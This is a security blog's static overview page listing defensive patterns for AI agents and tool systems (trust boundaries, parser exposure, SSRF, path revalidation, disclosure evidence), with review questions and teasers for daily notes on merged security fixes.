Static page

AI Security Patterns

This is the evergreen map behind the daily notes: recurring ways AI products, agent frameworks, MCP-style tool systems, and OSS automation cross from data into authority.

The core thesis is simple:

AI security issues become real when untrusted content crosses into tools, memory, files, credentials, browsers, network calls, or human approval paths.

Pattern

Agent/tool trust boundaries

Untrusted prompts, repo content, web pages, documents, and tool outputs become security-relevant when they can steer files, browsers, network calls, credentials, or approvals.

agent-securityprompt-injectionmcp
Pattern

Host-side parser exposure

Upload and import features are risky when attacker-controlled documents are parsed by privileged host services instead of isolated, bounded workers.

uploadsparser-securityactive-content
Pattern

SSRF through downstream clients

URL validation belongs at the request primitive, including redirect hops, fallback transports, and SDK clients that perform later network I/O.

ssrfredirectsoutbound-fetch
Pattern

Container, plugin, and tool-produced paths must be revalidated by the host before read, write, cleanup, or upload sinks touch the filesystem.

path-safetysymlinkshost-boundary
Pattern

Maintainer-friendly evidence

The best security work separates exploitability, trust boundary, compatibility cost, regression coverage, and disclosure unit before asking for a fix.

oss-hardeningdisclosureworkflow

Review questions

  • What untrusted object enters the system: prompt, document, URL, path, repo, webhook, model output, memory, or tool response?
  • Which component later treats that object as authority?
  • Where is the damaging sink: file I/O, HTTP fetch, browser automation, command execution, upload, approval, or stored state mutation?
  • Does validation happen at the sink, or only at an earlier caller/config layer?
  • Is there a compatibility escape hatch, and is it explicit, narrow, and regression-tested?
May 5, 2026
2026-05-05 — CI coverage is part of the evidence boundary

One PR merged in the 2026-05-05 Singapore window. It was not a new runtime security fix; it tightened the evidence layer around RAPTOR by making CI run the libexec wrapper tests...

May 4, 2026
2026-05-04 — Reference integrity is an evidence boundary

No PRs merged in the 2026-05-04 Singapore window. The useful movement was in the vault: maintainer feedback from an already-merged standards PR was converted into a checklist ch...

May 3, 2026
2026-05-03 — LLM candidates need explicit evidence contracts

No PRs merged in the 2026-05-03 Singapore window. The useful movement was in the research system: a source-ingestion pass turned an external LLM-assisted vulnerability-discovery...

May 2, 2026
2026-05-02 — Upload writes and evidence gates need sink-side proof

Four PRs merged in the 2026-05-02 Singapore window. One closed a concrete upload-write vulnerability. Two improved how RAPTOR turns review work into handoff-ready evidence. One ...

May 1, 2026
2026-05-01 — Sinks are where trust boundaries become real

Three PRs merged in the 2026-05-01 Singapore window. Two were direct security fixes, and one was a documentation artifact for operational handoff. The common thread was not the ...

Apr 30, 2026
2026-04-30 — Loopback should be an explicit sandbox boundary

One security PR merged in the 2026-04-30 Singapore window. The change was small in code, but it touched a boundary I care about: a service that is described and used as local sh...

Apr 29, 2026
2026-04-29 — Regression tests should follow the real exploit path

One PR merged in the 2026-04-29 Singapore window. It was intentionally test-only, but it mattered because the original OpenHarness bridge issue was not just a metadata mistake. ...

Apr 28, 2026
2026-04-28 — Local capabilities and sink boundaries

Six PRs merged in the 2026-04-28 Singapore window. The work split across OpenHarness, RAPTOR, FastGPT, and OWASP/APTS, but the boundary shape was consistent: do not let a string...